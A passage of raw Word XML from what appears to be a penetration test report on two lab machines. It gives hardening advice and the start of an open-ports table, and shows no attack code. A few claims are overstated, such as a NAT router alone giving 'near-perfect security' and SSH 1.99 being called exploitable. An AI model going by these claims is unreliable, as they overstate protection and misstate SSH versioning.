          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POP2 was long ago replaced by POP3, which supports authentication and privacy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142CD64A" w14:textId="458A85EC" w:rsidR="006301C2" w:rsidRDefault="00D704E4" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Again, this finding (# 2</w:t>
      </w:r>
      <w:r w:rsidR="004F6A9A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00181EDD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> goes back to use of FTP. Use SSH in its place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB9E11" w14:textId="4DE8125E" w:rsidR="00181EDD" w:rsidRDefault="00181EDD" w:rsidP="00F07544">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Do not allow use of weak passwords.</w:t>
      </w:r>
      <w:r w:rsidR="00F07544">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> One of many good sources of information on passwords can be found here:</w:t>
      </w:r>
      <w:r w:rsidR="00F07544">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00F07544" w:rsidRPr="00F07544">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="526AA6B7" w14:textId="42A5F765" w:rsidR="00A81100" w:rsidRDefault="00A81100" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable SNMP unless it is actually being used for monitoring, management, or logging (i.e. “traps”). If SNMP is used, use only SNMP version 3, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81100">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use both its authentication and privacy facilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410C431" w14:textId="46976215" w:rsidR="00A81100" w:rsidRDefault="00A81100" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Always keep all system software up-to-date.</w:t>
      </w:r>
      <w:r w:rsidR="00DC185F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The systems we tested</w:t>
      </w:r>
      <w:r w:rsidR="00FC1FF3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> were running very, very old software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42437839" w14:textId="5F4673FA" w:rsidR="00A81100" w:rsidRDefault="00A81100" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Never use any SSH version less than 2.0. SSH 1.99 and lower all have known, exploitable vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5EE364" w14:textId="481D945C" w:rsidR="00A81100" w:rsidRDefault="00A81100" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As above, never use any SSH version less than 2.0. SSH 1.99 and lower all have known, exploitable vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91D98C" w14:textId="77777777" w:rsidR="00A81100" w:rsidRDefault="00A81100" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D16D42" w14:textId="5F53DDB2" w:rsidR="00A81100" w:rsidRDefault="00A81100" w:rsidP="00A81100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Install, use, and keep up-to-date anti-malware software, a host-based firewall, a network firewall, a network intrusion prevention system, and a NAT router (this alone offers near-perfect security for inbound threats).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6CF006" w14:textId="67BBB511" w:rsidR="00A81100" w:rsidRDefault="00A81100" w:rsidP="00A81100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable UPnP. </w:t>
      </w:r>
      <w:r w:rsidR="008918D5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>While convenient, this protocol allows ports to be opened on your firewall unbeknownst to you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE0967" w14:textId="4CB019EC" w:rsidR="008918D5" w:rsidRDefault="008918D5" w:rsidP="00A81100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assuming you have the protections recommended above in place, be aware that most malware is unknowingly pulled into the system by the user, as opposed to it finding its way in via discovering and exploiting vulnerabilities. Always follow the well-known advice of being careful what links you click on, what email attachments you open, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E861DE9" w14:textId="2799D9D9" w:rsidR="007A6DCF" w:rsidRDefault="005C2F04" w:rsidP="007A6DCF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>All of these points are important, but in the case of this pene</w:t>
      </w:r>
      <w:r w:rsidR="00F85A01">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tration test, points 2, 3, and 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> were what allowed us to fully compromise both systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E730A81" w14:textId="77777777" w:rsidR="00F07544" w:rsidRPr="007A6DCF" w:rsidRDefault="00F07544" w:rsidP="007A6DCF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543DEFCF" w14:textId="77777777" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="00CE3DD9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc422058354"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TECHNICAL REPORT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2BD98783" w14:textId="0FF0B5AD" w:rsidR="00F45D43" w:rsidRPr="00F45D43" w:rsidRDefault="00F45D43" w:rsidP="00F45D43">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc422058355"/>
      <w:r>
        <w:t>Target Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="0D96E8D9" w14:textId="17FC55CE" w:rsidR="00D644ED" w:rsidRDefault="00D644ED" w:rsidP="00D644ED">
      <w:r>
        <w:t>We will begin our technical report with a report on the information we gathered on the two targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3237FE3E" w14:textId="53FE075D" w:rsidR="00B66E87" w:rsidRDefault="00C24581" w:rsidP="00F45D43">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Open ports were as shown below. Orange denotes danger</w:t>
      </w:r>
      <w:r w:rsidR="00601105">
        <w:t xml:space="preserve"> due to use of plaintext</w:t>
      </w:r>
      <w:r>
        <w:t>. Red denotes danger due to this port being associated with malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B96B016" w14:textId="7240D44D" w:rsidR="00B66E87" w:rsidRPr="00B66E87" w:rsidRDefault="00B66E87" w:rsidP="00B66E87">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc422058347"/>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AB13BF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B66E87">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Open Ports</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2812"/>
        <w:gridCol w:w="2582"/>
        <w:gridCol w:w="2470"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B6230" w:rsidRPr="00D644ED" w14:paraId="26B22DB4" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B5B679B" w14:textId="717144AF" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D644ED">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> →</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D86E084" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>cptvm1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40729F4E" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>192.168.1.227/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B1B09DC" w14:textId="401F8C54" w:rsidR="00515C28" w:rsidRPr="00D644ED" w:rsidRDefault="00515C28" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Linux 2.4.20</w:t>
            </w:r>
            <w:r w:rsidR="00F17D28">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F17D28" w:rsidRPr="00E44D11">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>(11/29/2002)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="764F293D" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>cptvm2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7079F8ED" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>192.168.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00DC4F89">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>6/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2755EEAD" w14:textId="15575640" w:rsidR="00515C28" w:rsidRPr="00D644ED" w:rsidRDefault="00515C28" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Linux 2.6.18</w:t>
            </w:r>
            <w:r w:rsidR="00F17D28">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F17D28" w:rsidRPr="00E44D11">
              <w:rPr>
                <w:b/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>(9/20/2006)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00390EF6" w14:paraId="74AB1EA7" w14:textId="77777777" w:rsidTr="00E027AD">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="2E9A6896" w14:textId="6CECEAAD" w:rsidR="00390EF6" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r w:rsidRPr="00D644ED">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> ↓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="27080600" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63C3D68A" w14:textId="63F8F779" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>7/tcp (echo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="07F6C76C" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="214D216D" w14:textId="35D445AA" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="0FC345B1" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="79DAF8B3" w14:textId="613AD55D" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>21/tcp (ftp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="4070E1C5" w14:textId="358B4A8B" w:rsidR="003B6230" w:rsidRPr="00213A4C" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="459211D7" w14:textId="3BB7870B" w:rsidR="003B6230" w:rsidRPr="00213A4C" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="05C678A1" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51554FF2" w14:textId="29184D05" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>22/tcp (ssh)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1074B894" w14:textId="58A56B24" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="68D9C77A" w14:textId="5D0C2243" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="4E351CA6" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="2A0E5BC8" w14:textId="244F7270" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>23/tcp (telnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="55BC546C" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="34FFA3A1" w14:textId="0AC494F4" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="21AC2DAB" w14:textId="77777777" w:rsidTr="00B66E87">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6698D8E1" w14:textId="16E60051" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>79/tcp (finger)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="75B65A46" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FB22E6E" w14:textId="329313F5" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="4FD266DF" w14:textId="77777777" w:rsidTr="00406324">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6560CEC3" w14:textId="10A6DDCC" w:rsidR="003B6230" w:rsidRPr="00D644ED" w:rsidRDefault="003B6230" w:rsidP="00B66E87">
            <w:pPr>
              <w:keepLines/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>80/tcp (http)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="7EBCA424" w14:textId="77777777" w:rsidR="003B6230" w:rsidRDefault="003B6230" w:rsidP="00D644ED"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25F1FF0D" w14:textId="4F716423" w:rsidR="003B6230" w:rsidRDefault="00390EF6" w:rsidP="00D644ED">
            <w:r>
              <w:t>OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B6230" w14:paraId="62A4AC2B" w14:textId="77777777" w:rsidTr="00406324">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
